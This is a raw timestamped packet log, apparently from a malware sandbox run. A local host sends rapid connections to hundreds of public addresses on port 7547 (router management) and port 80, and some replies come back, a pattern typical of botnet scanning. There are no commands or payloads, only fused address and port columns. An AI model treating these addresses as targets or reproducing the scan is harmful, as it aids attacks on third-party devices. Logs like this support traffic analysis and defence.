                                          Nov 7, 2024 11:57:58.402416945 CET7547305632.189.212.17192.168.2.13
                                          Nov 7, 2024 11:57:58.402429104 CET30567547192.168.2.13154.59.51.205
                                          Nov 7, 2024 11:57:58.402430058 CET7547305659.6.218.207192.168.2.13
                                          Nov 7, 2024 11:57:58.402432919 CET30567547192.168.2.1318.125.64.245
                                          Nov 7, 2024 11:57:58.402442932 CET75473056135.40.180.146192.168.2.13
                                          Nov 7, 2024 11:57:58.402450085 CET30567547192.168.2.1332.189.212.17
                                          Nov 7, 2024 11:57:58.402456045 CET75473056145.209.43.210192.168.2.13
                                          Nov 7, 2024 11:57:58.402458906 CET30567547192.168.2.1359.6.218.207
                                          Nov 7, 2024 11:57:58.402468920 CET7547305614.205.204.181192.168.2.13
                                          Nov 7, 2024 11:57:58.402471066 CET30567547192.168.2.13135.40.180.146
                                          Nov 7, 2024 11:57:58.402482033 CET7547305670.51.46.4192.168.2.13
                                          Nov 7, 2024 11:57:58.402484894 CET30567547192.168.2.13145.209.43.210
                                          Nov 7, 2024 11:57:58.402496099 CET75473056183.137.36.62192.168.2.13
                                          Nov 7, 2024 11:57:58.402503967 CET30567547192.168.2.1314.205.204.181
                                          Nov 7, 2024 11:57:58.402508974 CET75473056184.44.89.65192.168.2.13
                                          Nov 7, 2024 11:57:58.402518034 CET228880192.168.2.13206.118.205.121
                                          Nov 7, 2024 11:57:58.402519941 CET30567547192.168.2.1370.51.46.4
                                          Nov 7, 2024 11:57:58.402520895 CET7547305644.0.199.249192.168.2.13
                                          Nov 7, 2024 11:57:58.402520895 CET30567547192.168.2.13183.137.36.62
                                          Nov 7, 2024 11:57:58.402534962 CET7547305678.18.228.213192.168.2.13
                                          Nov 7, 2024 11:57:58.402539968 CET30567547192.168.2.13184.44.89.65
                                          Nov 7, 2024 11:57:58.402548075 CET75473056217.20.231.187192.168.2.13
                                          Nov 7, 2024 11:57:58.402554035 CET30567547192.168.2.1344.0.199.249
                                          Nov 7, 2024 11:57:58.402558088 CET30567547192.168.2.1378.18.228.213
                                          Nov 7, 2024 11:57:58.402589083 CET75473056134.224.234.137192.168.2.13
                                          Nov 7, 2024 11:57:58.402601957 CET75473056159.217.165.27192.168.2.13
                                          Nov 7, 2024 11:57:58.402602911 CET30567547192.168.2.13217.20.231.187
                                          Nov 7, 2024 11:57:58.402612925 CET7547305634.47.175.111192.168.2.13
                                          Nov 7, 2024 11:57:58.402625084 CET75473056109.64.158.80192.168.2.13
                                          Nov 7, 2024 11:57:58.402630091 CET228880192.168.2.13206.88.204.203
                                          Nov 7, 2024 11:57:58.402630091 CET30567547192.168.2.13159.217.165.27
                                          Nov 7, 2024 11:57:58.402631998 CET30567547192.168.2.13134.224.234.137
                                          Nov 7, 2024 11:57:58.402635098 CET228880192.168.2.13206.205.129.44
                                          Nov 7, 2024 11:57:58.402638912 CET7547305680.232.117.65192.168.2.13
                                          Nov 7, 2024 11:57:58.402645111 CET228880192.168.2.13206.70.233.81
                                          Nov 7, 2024 11:57:58.402645111 CET228880192.168.2.13206.250.134.104
                                          Nov 7, 2024 11:57:58.402643919 CET228880192.168.2.13206.166.175.234
                                          Nov 7, 2024 11:57:58.402645111 CET228880192.168.2.13206.58.134.68
                                          Nov 7, 2024 11:57:58.402652979 CET7547305664.120.131.234192.168.2.13
                                          Nov 7, 2024 11:57:58.402652979 CET30567547192.168.2.13109.64.158.80
                                          Nov 7, 2024 11:57:58.402678013 CET30567547192.168.2.1380.232.117.65
                                          Nov 7, 2024 11:57:58.402682066 CET75473056175.11.45.189192.168.2.13
                                          Nov 7, 2024 11:57:58.402683020 CET30567547192.168.2.1334.47.175.111
                                          Nov 7, 2024 11:57:58.402683020 CET30567547192.168.2.1364.120.131.234
                                          Nov 7, 2024 11:57:58.402695894 CET7547305653.218.101.82192.168.2.13
                                          Nov 7, 2024 11:57:58.402708054 CET75473056174.222.47.188192.168.2.13
                                          Nov 7, 2024 11:57:58.402720928 CET30567547192.168.2.13175.11.45.189
                                          Nov 7, 2024 11:57:58.402723074 CET75473056180.194.139.30192.168.2.13
                                          Nov 7, 2024 11:57:58.402735949 CET7547305660.29.156.35192.168.2.13
                                          Nov 7, 2024 11:57:58.402736902 CET30567547192.168.2.1353.218.101.82
                                          Nov 7, 2024 11:57:58.402744055 CET30567547192.168.2.13174.222.47.188
                                          Nov 7, 2024 11:57:58.402748108 CET75473056111.107.162.65192.168.2.13
                                          Nov 7, 2024 11:57:58.402749062 CET228880192.168.2.13206.29.243.132
                                          Nov 7, 2024 11:57:58.402756929 CET30567547192.168.2.13180.194.139.30
                                          Nov 7, 2024 11:57:58.402760029 CET7547305675.173.132.152192.168.2.13
                                          Nov 7, 2024 11:57:58.402765989 CET30567547192.168.2.1360.29.156.35
                                          Nov 7, 2024 11:57:58.402772903 CET7547305613.196.247.47192.168.2.13
                                          Nov 7, 2024 11:57:58.402785063 CET754730562.219.200.34192.168.2.13
                                          Nov 7, 2024 11:57:58.402786016 CET30567547192.168.2.1375.173.132.152
                                          Nov 7, 2024 11:57:58.402798891 CET7547305657.100.168.6192.168.2.13
                                          Nov 7, 2024 11:57:58.402803898 CET30567547192.168.2.1313.196.247.47
                                          Nov 7, 2024 11:57:58.402811050 CET75473056200.241.201.17192.168.2.13
                                          Nov 7, 2024 11:57:58.402816057 CET30567547192.168.2.13111.107.162.65
                                          Nov 7, 2024 11:57:58.402816057 CET30567547192.168.2.132.219.200.34
                                          Nov 7, 2024 11:57:58.402823925 CET75473056116.99.41.102192.168.2.13
                                          Nov 7, 2024 11:57:58.402827024 CET30567547192.168.2.1357.100.168.6
                                          Nov 7, 2024 11:57:58.402827978 CET228880192.168.2.13206.206.103.229
                                          Nov 7, 2024 11:57:58.402832031 CET228880192.168.2.13206.198.192.212
                                          Nov 7, 2024 11:57:58.402836084 CET30567547192.168.2.13200.241.201.17
                                          Nov 7, 2024 11:57:58.402838945 CET75473056119.90.46.53192.168.2.13
                                          Nov 7, 2024 11:57:58.402843952 CET228880192.168.2.13206.148.119.38
                                          Nov 7, 2024 11:57:58.402846098 CET228880192.168.2.13206.240.29.38
                                          Nov 7, 2024 11:57:58.402853012 CET7547305653.31.57.89192.168.2.13
                                          Nov 7, 2024 11:57:58.402857065 CET30567547192.168.2.13116.99.41.102
                                          Nov 7, 2024 11:57:58.402864933 CET228880192.168.2.13206.222.190.232
                                          Nov 7, 2024 11:57:58.402868032 CET228880192.168.2.13206.85.124.73
                                          Nov 7, 2024 11:57:58.402868986 CET30567547192.168.2.13119.90.46.53
                                          Nov 7, 2024 11:57:58.402874947 CET7547305666.253.97.139192.168.2.13
                                          Nov 7, 2024 11:57:58.402885914 CET30567547192.168.2.1353.31.57.89
                                          Nov 7, 2024 11:57:58.402888060 CET754730561.188.231.103192.168.2.13
                                          Nov 7, 2024 11:57:58.402900934 CET228880192.168.2.13206.73.239.134
                                          Nov 7, 2024 11:57:58.402900934 CET75473056204.78.93.26192.168.2.13
                                          Nov 7, 2024 11:57:58.402906895 CET30567547192.168.2.1366.253.97.139
                                          Nov 7, 2024 11:57:58.402914047 CET75473056146.190.75.64192.168.2.13
                                          Nov 7, 2024 11:57:58.402925014 CET30567547192.168.2.131.188.231.103
                                          Nov 7, 2024 11:57:58.402925968 CET7547305662.223.240.104192.168.2.13
                                          Nov 7, 2024 11:57:58.402936935 CET228880192.168.2.13206.20.254.199
                                          Nov 7, 2024 11:57:58.402939081 CET75473056145.246.45.190192.168.2.13
                                          Nov 7, 2024 11:57:58.402944088 CET30567547192.168.2.13204.78.93.26
                                          Nov 7, 2024 11:57:58.402949095 CET30567547192.168.2.13146.190.75.64
                                          Nov 7, 2024 11:57:58.402951956 CET7547305678.4.119.250192.168.2.13
                                          Nov 7, 2024 11:57:58.402956963 CET30567547192.168.2.1362.223.240.104
                                          Nov 7, 2024 11:57:58.402966022 CET75473056140.190.241.102192.168.2.13
                                          Nov 7, 2024 11:57:58.402970076 CET30567547192.168.2.13145.246.45.190
                                          Nov 7, 2024 11:57:58.402980089 CET30567547192.168.2.1378.4.119.250
                                          Nov 7, 2024 11:57:58.402992964 CET30567547192.168.2.13140.190.241.102
                                          Nov 7, 2024 11:57:58.403019905 CET228880192.168.2.13206.52.36.18
                                          Nov 7, 2024 11:57:58.403032064 CET228880192.168.2.13206.181.234.117
                                          Nov 7, 2024 11:57:58.403032064 CET228880192.168.2.13206.140.103.46
                                          Nov 7, 2024 11:57:58.403033018 CET228880192.168.2.13206.63.6.83
                                          Nov 7, 2024 11:57:58.403048992 CET228880192.168.2.13206.153.160.73
                                          Nov 7, 2024 11:57:58.403069019 CET228880192.168.2.13206.91.120.226
                                          Nov 7, 2024 11:57:58.403084993 CET7547305648.11.177.160192.168.2.13
                                          Nov 7, 2024 11:57:58.403098106 CET75473056104.226.184.97192.168.2.13
                                          Nov 7, 2024 11:57:58.403100967 CET228880192.168.2.13206.12.212.87
                                          Nov 7, 2024 11:57:58.403110027 CET7547305689.252.35.164192.168.2.13
                                          Nov 7, 2024 11:57:58.403120041 CET228880192.168.2.13206.255.5.232
                                          Nov 7, 2024 11:57:58.403120041 CET30567547192.168.2.1348.11.177.160
                                          Nov 7, 2024 11:57:58.403120041 CET228880192.168.2.13206.182.212.168
                                          Nov 7, 2024 11:57:58.403124094 CET7547305618.132.198.84192.168.2.13
                                          Nov 7, 2024 11:57:58.403140068 CET30567547192.168.2.13104.226.184.97
                                          Nov 7, 2024 11:57:58.403143883 CET754730564.238.58.154192.168.2.13
                                          Nov 7, 2024 11:57:58.403145075 CET30567547192.168.2.1389.252.35.164
                                          Nov 7, 2024 11:57:58.403161049 CET30567547192.168.2.1318.132.198.84
                                          Nov 7, 2024 11:57:58.403172970 CET75473056101.45.21.89192.168.2.13
                                          Nov 7, 2024 11:57:58.403173923 CET30567547192.168.2.134.238.58.154
                                          Nov 7, 2024 11:57:58.403187037 CET7547305687.141.20.197192.168.2.13
                                          Nov 7, 2024 11:57:58.403199911 CET7547305644.147.185.108192.168.2.13
                                          Nov 7, 2024 11:57:58.403212070 CET7547305667.202.11.69192.168.2.13
                                          Nov 7, 2024 11:57:58.403223991 CET30567547192.168.2.1387.141.20.197
                                          Nov 7, 2024 11:57:58.403224945 CET75473056209.27.221.55192.168.2.13
                                          Nov 7, 2024 11:57:58.403225899 CET228880192.168.2.13206.133.225.136
                                          Nov 7, 2024 11:57:58.403228045 CET228880192.168.2.13206.60.215.88
                                          Nov 7, 2024 11:57:58.403238058 CET75473056114.204.163.252192.168.2.13
                                          Nov 7, 2024 11:57:58.403239012 CET30567547192.168.2.1344.147.185.108
                                          Nov 7, 2024 11:57:58.403239965 CET30567547192.168.2.13101.45.21.89
                                          Nov 7, 2024 11:57:58.403244972 CET30567547192.168.2.13209.27.221.55
                                          Nov 7, 2024 11:57:58.403251886 CET75473056171.209.86.222192.168.2.13
                                          Nov 7, 2024 11:57:58.403265953 CET30567547192.168.2.1367.202.11.69
                                          Nov 7, 2024 11:57:58.403265953 CET228880192.168.2.13206.109.34.69
                                          Nov 7, 2024 11:57:58.403265953 CET7547305657.7.75.176192.168.2.13
                                          Nov 7, 2024 11:57:58.403279066 CET75473056112.230.182.194192.168.2.13
                                          Nov 7, 2024 11:57:58.403285980 CET30567547192.168.2.13171.209.86.222
                                          Nov 7, 2024 11:57:58.403290033 CET7547305644.126.56.28192.168.2.13
                                          Nov 7, 2024 11:57:58.403296947 CET228880192.168.2.13206.6.136.0
                                          Nov 7, 2024 11:57:58.403296947 CET228880192.168.2.13206.244.78.247
                                          Nov 7, 2024 11:57:58.403301001 CET30567547192.168.2.1357.7.75.176
                                          Nov 7, 2024 11:57:58.403302908 CET30567547192.168.2.13114.204.163.252
                                          Nov 7, 2024 11:57:58.403305054 CET7547305691.165.202.140192.168.2.13
                                          Nov 7, 2024 11:57:58.403309107 CET30567547192.168.2.13112.230.182.194
                                          Nov 7, 2024 11:57:58.403320074 CET30567547192.168.2.1344.126.56.28
                                          Nov 7, 2024 11:57:58.403326988 CET228880192.168.2.13206.0.241.145
                                          Nov 7, 2024 11:57:58.403327942 CET75473056154.131.28.215192.168.2.13
                                          Nov 7, 2024 11:57:58.403342009 CET7547305690.66.18.81192.168.2.13
                                          Nov 7, 2024 11:57:58.403342962 CET30567547192.168.2.1391.165.202.140
                                          Nov 7, 2024 11:57:58.403354883 CET75473056218.212.250.29192.168.2.13
                                          Nov 7, 2024 11:57:58.403367996 CET75473056101.117.76.66192.168.2.13
                                          Nov 7, 2024 11:57:58.403368950 CET30567547192.168.2.1390.66.18.81
                                          Nov 7, 2024 11:57:58.403378010 CET30567547192.168.2.13154.131.28.215
                                          Nov 7, 2024 11:57:58.403379917 CET75473056186.67.70.121192.168.2.13
                                          Nov 7, 2024 11:57:58.403384924 CET30567547192.168.2.13218.212.250.29
                                          Nov 7, 2024 11:57:58.403394938 CET75473056155.119.245.88192.168.2.13
                                          Nov 7, 2024 11:57:58.403398037 CET30567547192.168.2.13101.117.76.66
                                          Nov 7, 2024 11:57:58.403407097 CET75473056163.203.111.255192.168.2.13
                                          Nov 7, 2024 11:57:58.403415918 CET30567547192.168.2.13186.67.70.121
                                          Nov 7, 2024 11:57:58.403419971 CET7547305679.249.168.238192.168.2.13
                                          Nov 7, 2024 11:57:58.403424978 CET30567547192.168.2.13155.119.245.88
                                          Nov 7, 2024 11:57:58.403444052 CET75473056184.144.211.213192.168.2.13
                                          Nov 7, 2024 11:57:58.403449059 CET30567547192.168.2.1379.249.168.238
                                          Nov 7, 2024 11:57:58.403455019 CET228880192.168.2.13206.132.128.41
                                          Nov 7, 2024 11:57:58.403455973 CET228880192.168.2.13206.238.92.144
                                          Nov 7, 2024 11:57:58.403456926 CET7547305614.228.142.110192.168.2.13
                                          Nov 7, 2024 11:57:58.403469086 CET75473056212.114.89.146192.168.2.13
                                          Nov 7, 2024 11:57:58.403471947 CET30567547192.168.2.13163.203.111.255
                                          Nov 7, 2024 11:57:58.403476000 CET30567547192.168.2.13184.144.211.213
                                          Nov 7, 2024 11:57:58.403481007 CET75473056189.219.105.161192.168.2.13
                                          Nov 7, 2024 11:57:58.403503895 CET7547305698.187.49.93192.168.2.13
                                          Nov 7, 2024 11:57:58.403507948 CET30567547192.168.2.13212.114.89.146
                                          Nov 7, 2024 11:57:58.403512955 CET30567547192.168.2.1314.228.142.110
                                          Nov 7, 2024 11:57:58.403512955 CET30567547192.168.2.13189.219.105.161
                                          Nov 7, 2024 11:57:58.403513908 CET228880192.168.2.13206.152.252.90
                                          Nov 7, 2024 11:57:58.403516054 CET75473056209.12.129.227192.168.2.13
                                          Nov 7, 2024 11:57:58.403528929 CET75473056218.81.118.95192.168.2.13
                                          Nov 7, 2024 11:57:58.403532028 CET30567547192.168.2.1398.187.49.93
                                          Nov 7, 2024 11:57:58.403542042 CET75473056185.177.118.191192.168.2.13
                                          Nov 7, 2024 11:57:58.403553963 CET75473056203.228.213.6192.168.2.13
                                          Nov 7, 2024 11:57:58.403562069 CET30567547192.168.2.13218.81.118.95
                                          Nov 7, 2024 11:57:58.403564930 CET30567547192.168.2.13209.12.129.227
                                          Nov 7, 2024 11:57:58.403567076 CET75473056128.248.215.197192.168.2.13
                                          Nov 7, 2024 11:57:58.403573990 CET30567547192.168.2.13185.177.118.191
                                          Nov 7, 2024 11:57:58.403573990 CET30567547192.168.2.13203.228.213.6
                                          Nov 7, 2024 11:57:58.403580904 CET75473056208.2.158.171192.168.2.13
                                          Nov 7, 2024 11:57:58.403593063 CET75473056166.199.189.237192.168.2.13
                                          Nov 7, 2024 11:57:58.403600931 CET30567547192.168.2.13128.248.215.197
                                          Nov 7, 2024 11:57:58.403604984 CET75473056131.183.25.247192.168.2.13
                                          Nov 7, 2024 11:57:58.403609037 CET30567547192.168.2.13208.2.158.171
                                          Nov 7, 2024 11:57:58.403618097 CET75473056163.231.232.208192.168.2.13
                                          Nov 7, 2024 11:57:58.403620958 CET228880192.168.2.13206.40.11.8
                                          Nov 7, 2024 11:57:58.403625011 CET30567547192.168.2.13166.199.189.237
                                          Nov 7, 2024 11:57:58.403628111 CET30567547192.168.2.13131.183.25.247
                                          Nov 7, 2024 11:57:58.403635025 CET75473056175.177.200.154192.168.2.13
                                          Nov 7, 2024 11:57:58.403647900 CET75473056139.35.14.129192.168.2.13
                                          Nov 7, 2024 11:57:58.403651953 CET30567547192.168.2.13163.231.232.208
                                          Nov 7, 2024 11:57:58.403661013 CET7547305643.193.190.163192.168.2.13
                                          Nov 7, 2024 11:57:58.403673887 CET30567547192.168.2.13175.177.200.154
                                          Nov 7, 2024 11:57:58.403676033 CET75473056168.136.141.190192.168.2.13
                                          Nov 7, 2024 11:57:58.403681040 CET30567547192.168.2.13139.35.14.129
                                          Nov 7, 2024 11:57:58.403690100 CET75473056183.152.162.86192.168.2.13
                                          Nov 7, 2024 11:57:58.403693914 CET30567547192.168.2.1343.193.190.163
                                          Nov 7, 2024 11:57:58.403702021 CET75473056126.145.201.164192.168.2.13
                                          Nov 7, 2024 11:57:58.403711081 CET30567547192.168.2.13168.136.141.190
                                          Nov 7, 2024 11:57:58.403712988 CET228880192.168.2.13206.169.17.118
                                          Nov 7, 2024 11:57:58.403713942 CET7547305642.123.196.81192.168.2.13
                                          Nov 7, 2024 11:57:58.403714895 CET228880192.168.2.13206.68.11.243
                                          Nov 7, 2024 11:57:58.403716087 CET228880192.168.2.13206.194.14.87
                                          Nov 7, 2024 11:57:58.403727055 CET7547305643.227.20.87192.168.2.13
                                          Nov 7, 2024 11:57:58.403729916 CET30567547192.168.2.13183.152.162.86
                                          Nov 7, 2024 11:57:58.403739929 CET75473056133.45.77.241192.168.2.13
                                          Nov 7, 2024 11:57:58.403744936 CET30567547192.168.2.1342.123.196.81
                                          Nov 7, 2024 11:57:58.403752089 CET7547305683.122.19.198192.168.2.13
                                          Nov 7, 2024 11:57:58.403753042 CET30567547192.168.2.13126.145.201.164
                                          Nov 7, 2024 11:57:58.403753042 CET30567547192.168.2.1343.227.20.87
                                          Nov 7, 2024 11:57:58.403774977 CET30567547192.168.2.1383.122.19.198
                                          Nov 7, 2024 11:57:58.403784990 CET30567547192.168.2.13133.45.77.241
                                          Nov 7, 2024 11:57:58.403814077 CET228880192.168.2.13206.217.202.54
                                          Nov 7, 2024 11:57:58.403815985 CET228880192.168.2.13206.68.45.208
                                          Nov 7, 2024 11:57:58.403831959 CET228880192.168.2.13206.137.241.181
                                          Nov 7, 2024 11:57:58.403867960 CET228880192.168.2.13206.114.160.118
                                          Nov 7, 2024 11:57:58.403902054 CET228880192.168.2.13206.184.82.97
                                          Nov 7, 2024 11:57:58.403903961 CET228880192.168.2.13206.218.206.14
                                          Nov 7, 2024 11:57:58.403908014 CET75473056172.180.134.14192.168.2.13
                                          Nov 7, 2024 11:57:58.403922081 CET75473056199.4.180.116192.168.2.13
                                          Nov 7, 2024 11:57:58.403935909 CET75473056112.152.116.110192.168.2.13
                                          Nov 7, 2024 11:57:58.403948069 CET7547305695.198.156.27192.168.2.13
                                          Nov 7, 2024 11:57:58.403950930 CET30567547192.168.2.13199.4.180.116
                                          Nov 7, 2024 11:57:58.403960943 CET75473056124.33.119.2192.168.2.13
                                          Nov 7, 2024 11:57:58.403964043 CET30567547192.168.2.13112.152.116.110
                                          Nov 7, 2024 11:57:58.403973103 CET7547305679.37.65.208192.168.2.13
                                          Nov 7, 2024 11:57:58.403980970 CET30567547192.168.2.1395.198.156.27
                                          Nov 7, 2024 11:57:58.403985977 CET7547305654.138.119.51192.168.2.13
                                          Nov 7, 2024 11:57:58.403989077 CET30567547192.168.2.13124.33.119.2
                                          Nov 7, 2024 11:57:58.403992891 CET30567547192.168.2.13172.180.134.14
                                          Nov 7, 2024 11:57:58.403999090 CET75473056173.121.7.50192.168.2.13
                                          Nov 7, 2024 11:57:58.404004097 CET30567547192.168.2.1379.37.65.208
                                          Nov 7, 2024 11:57:58.404014111 CET75473056146.165.195.231192.168.2.13
                                          Nov 7, 2024 11:57:58.404023886 CET30567547192.168.2.1354.138.119.51
                                          Nov 7, 2024 11:57:58.404026985 CET7547305691.16.22.236192.168.2.13
                                          Nov 7, 2024 11:57:58.404036999 CET30567547192.168.2.13173.121.7.50
                                          Nov 7, 2024 11:57:58.404040098 CET75473056202.238.222.231192.168.2.13
                                          Nov 7, 2024 11:57:58.404047012 CET30567547192.168.2.13146.165.195.231
                                          Nov 7, 2024 11:57:58.404052019 CET30567547192.168.2.1391.16.22.236
                                          Nov 7, 2024 11:57:58.404066086 CET75473056221.167.200.71192.168.2.13
                                          Nov 7, 2024 11:57:58.404078960 CET75473056223.228.16.239192.168.2.13
                                          Nov 7, 2024 11:57:58.404078960 CET30567547192.168.2.13202.238.222.231
                                          Nov 7, 2024 11:57:58.404092073 CET75473056123.90.243.185192.168.2.13
                                          Nov 7, 2024 11:57:58.404093027 CET30567547192.168.2.13221.167.200.71
                                          Nov 7, 2024 11:57:58.404094934 CET228880192.168.2.13206.119.88.94
                                          Nov 7, 2024 11:57:58.404094934 CET228880192.168.2.13206.34.111.146
                                          Nov 7, 2024 11:57:58.404099941 CET228880192.168.2.13206.94.7.244
                                          Nov 7, 2024 11:57:58.404105902 CET7547305658.227.71.85192.168.2.13
                                          Nov 7, 2024 11:57:58.404107094 CET30567547192.168.2.13223.228.16.239
                                          Nov 7, 2024 11:57:58.404110909 CET228880192.168.2.13206.63.42.53
                                          Nov 7, 2024 11:57:58.404119015 CET7547305612.140.146.26192.168.2.13
                                          Nov 7, 2024 11:57:58.404122114 CET30567547192.168.2.13123.90.243.185
                                          Nov 7, 2024 11:57:58.404123068 CET228880192.168.2.13206.132.61.0
                                          Nov 7, 2024 11:57:58.404133081 CET75473056150.131.50.75192.168.2.13
                                          Nov 7, 2024 11:57:58.404134989 CET30567547192.168.2.1358.227.71.85
                                          Nov 7, 2024 11:57:58.404145956 CET75473056187.119.31.9192.168.2.13
                                          Nov 7, 2024 11:57:58.404150009 CET30567547192.168.2.1312.140.146.26
                                          Nov 7, 2024 11:57:58.404159069 CET75473056120.188.9.130192.168.2.13
                                          Nov 7, 2024 11:57:58.404170990 CET7547305625.245.213.174192.168.2.13
                                          Nov 7, 2024 11:57:58.404175997 CET30567547192.168.2.13150.131.50.75
                                          Nov 7, 2024 11:57:58.404175997 CET30567547192.168.2.13187.119.31.9
                                          Nov 7, 2024 11:57:58.404182911 CET7547305685.133.16.229192.168.2.13
                                          Nov 7, 2024 11:57:58.404186964 CET228880192.168.2.13206.89.163.78
                                          Nov 7, 2024 11:57:58.404189110 CET30567547192.168.2.13120.188.9.130
                                          Nov 7, 2024 11:57:58.404196978 CET75473056104.176.122.183192.168.2.13
                                          Nov 7, 2024 11:57:58.404196978 CET30567547192.168.2.1325.245.213.174
                                          Nov 7, 2024 11:57:58.404211044 CET75473056169.180.232.46192.168.2.13
                                          Nov 7, 2024 11:57:58.404218912 CET30567547192.168.2.1385.133.16.229
                                          Nov 7, 2024 11:57:58.404218912 CET228880192.168.2.13206.19.188.55
                                          Nov 7, 2024 11:57:58.404222965 CET75473056128.72.23.200192.168.2.13
                                          Nov 7, 2024 11:57:58.404232025 CET228880192.168.2.13206.37.76.42
                                          Nov 7, 2024 11:57:58.404232025 CET30567547192.168.2.13104.176.122.183
                                          Nov 7, 2024 11:57:58.404236078 CET75473056153.112.130.142192.168.2.13
                                          Nov 7, 2024 11:57:58.404241085 CET30567547192.168.2.13169.180.232.46
                                          Nov 7, 2024 11:57:58.404248953 CET7547305627.114.39.197192.168.2.13
                                          Nov 7, 2024 11:57:58.404262066 CET75473056148.160.95.164192.168.2.13
                                          Nov 7, 2024 11:57:58.404269934 CET30567547192.168.2.13128.72.23.200
                                          Nov 7, 2024 11:57:58.404272079 CET30567547192.168.2.13153.112.130.142
                                          Nov 7, 2024 11:57:58.404272079 CET228880192.168.2.13206.57.138.76
                                          Nov 7, 2024 11:57:58.404273987 CET75473056176.5.168.147192.168.2.13
                                          Nov 7, 2024 11:57:58.404274940 CET30567547192.168.2.1327.114.39.197
                                          Nov 7, 2024 11:57:58.404287100 CET7547305627.255.169.69192.168.2.13
                                          Nov 7, 2024 11:57:58.404297113 CET30567547192.168.2.13148.160.95.164
                                          Nov 7, 2024 11:57:58.404303074 CET75473056193.66.35.130192.168.2.13
                                          Nov 7, 2024 11:57:58.404315948 CET75473056158.108.34.87192.168.2.13
                                          Nov 7, 2024 11:57:58.404316902 CET30567547192.168.2.13176.5.168.147
                                          Nov 7, 2024 11:57:58.404328108 CET75473056112.10.221.157192.168.2.13
                                          Nov 7, 2024 11:57:58.404334068 CET30567547192.168.2.1327.255.169.69
                                          Nov 7, 2024 11:57:58.404334068 CET30567547192.168.2.13193.66.35.130
                                          Nov 7, 2024 11:57:58.404340982 CET754730565.40.242.159192.168.2.13
                                          Nov 7, 2024 11:57:58.404346943 CET30567547192.168.2.13158.108.34.87
                                          Nov 7, 2024 11:57:58.404356956 CET75473056191.223.15.38192.168.2.13
                                          Nov 7, 2024 11:57:58.404360056 CET228880192.168.2.13206.100.180.246
                                          Nov 7, 2024 11:57:58.404365063 CET30567547192.168.2.13112.10.221.157
                                          Nov 7, 2024 11:57:58.404371977 CET75473056197.86.104.3192.168.2.13
                                          Nov 7, 2024 11:57:58.404383898 CET7547305679.37.135.118192.168.2.13
                                          Nov 7, 2024 11:57:58.404385090 CET30567547192.168.2.13191.223.15.38
                                          Nov 7, 2024 11:57:58.404390097 CET30567547192.168.2.135.40.242.159
                                          Nov 7, 2024 11:57:58.404398918 CET30567547192.168.2.13197.86.104.3
                                          Nov 7, 2024 11:57:58.404429913 CET30567547192.168.2.1379.37.135.118
                                          Nov 7, 2024 11:57:58.404542923 CET228880192.168.2.13206.110.170.172
                                          Nov 7, 2024 11:57:58.404542923 CET228880192.168.2.13206.12.0.142
                                          Nov 7, 2024 11:57:58.404576063 CET228880192.168.2.13206.208.238.219
                                          Nov 7, 2024 11:57:58.404577017 CET228880192.168.2.13206.212.210.3
                                          Nov 7, 2024 11:57:58.404577971 CET228880192.168.2.13206.82.209.87
                                          Nov 7, 2024 11:57:58.404580116 CET7547305614.246.219.37192.168.2.13
                                          Nov 7, 2024 11:57:58.404587984 CET228880192.168.2.13206.221.16.0
                                          Nov 7, 2024 11:57:58.404592991 CET75473056168.205.249.96192.168.2.13
                                          Nov 7, 2024 11:57:58.404612064 CET30567547192.168.2.1314.246.219.37
                                          Nov 7, 2024 11:57:58.404622078 CET7547305689.48.254.205192.168.2.13
                                          Nov 7, 2024 11:57:58.404628992 CET228880192.168.2.13206.63.237.62
                                          Nov 7, 2024 11:57:58.404630899 CET30567547192.168.2.13168.205.249.96
                                          Nov 7, 2024 11:57:58.404639006 CET7547305650.151.1.21192.168.2.13
                                          Nov 7, 2024 11:57:58.404642105 CET228880192.168.2.13206.131.193.143
                                          Nov 7, 2024 11:57:58.404642105 CET228880192.168.2.13206.49.215.51
                                          Nov 7, 2024 11:57:58.404652119 CET7547305644.191.33.154192.168.2.13
                                          Nov 7, 2024 11:57:58.404654980 CET228880192.168.2.13206.10.185.76
                                          Nov 7, 2024 11:57:58.404654980 CET30567547192.168.2.1389.48.254.205
                                          Nov 7, 2024 11:57:58.404664993 CET7547305645.156.86.78192.168.2.13
                                          Nov 7, 2024 11:57:58.404670954 CET30567547192.168.2.1350.151.1.21
                                          Nov 7, 2024 11:57:58.404678106 CET7547305689.222.240.248192.168.2.13
                                          Nov 7, 2024 11:57:58.404684067 CET30567547192.168.2.1344.191.33.154
                                          Nov 7, 2024 11:57:58.404696941 CET30567547192.168.2.1345.156.86.78
                                          Nov 7, 2024 11:57:58.404699087 CET228880192.168.2.13206.244.152.101
                                          Nov 7, 2024 11:57:58.404706001 CET228880192.168.2.13206.215.186.71
                                          Nov 7, 2024 11:57:58.404714108 CET228880192.168.2.13206.10.197.179
                                          Nov 7, 2024 11:57:58.404716969 CET30567547192.168.2.1389.222.240.248
                                          Nov 7, 2024 11:57:58.404723883 CET228880192.168.2.13206.225.204.179
                                          Nov 7, 2024 11:57:58.404731989 CET228880192.168.2.13206.3.148.226
                                          Nov 7, 2024 11:57:58.404743910 CET228880192.168.2.13206.9.4.210
                                          Nov 7, 2024 11:57:58.404748917 CET228880192.168.2.13206.254.228.8
                                          Nov 7, 2024 11:57:58.404762030 CET228880192.168.2.13206.201.72.122
                                          Nov 7, 2024 11:57:58.404762983 CET228880192.168.2.13206.181.66.121
                                          Nov 7, 2024 11:57:58.404771090 CET228880192.168.2.13206.13.8.45
                                          Nov 7, 2024 11:57:58.404778957 CET228880192.168.2.13206.88.156.97
                                          Nov 7, 2024 11:57:58.404782057 CET228880192.168.2.13206.32.150.168
                                          Nov 7, 2024 11:57:58.404792070 CET7547305662.110.206.147192.168.2.13
                                          Nov 7, 2024 11:57:58.404799938 CET228880192.168.2.13206.81.66.27
                                          Nov 7, 2024 11:57:58.404803991 CET228880192.168.2.13206.61.35.118
                                          Nov 7, 2024 11:57:58.404804945 CET75473056170.6.27.3192.168.2.13
                                          Nov 7, 2024 11:57:58.404810905 CET75473056181.33.235.236192.168.2.13
                                          Nov 7, 2024 11:57:58.404814959 CET228880192.168.2.13206.88.123.56
                                          Nov 7, 2024 11:57:58.404818058 CET75473056103.198.243.13192.168.2.13
                                          Nov 7, 2024 11:57:58.404818058 CET228880192.168.2.13206.56.99.100
                                          Nov 7, 2024 11:57:58.404824972 CET75473056153.27.160.64192.168.2.13
                                          Nov 7, 2024 11:57:58.404831886 CET75473056108.140.205.74192.168.2.13
                                          Nov 7, 2024 11:57:58.404836893 CET228880192.168.2.13206.202.254.145
                                          Nov 7, 2024 11:57:58.404836893 CET228880192.168.2.13206.104.67.189
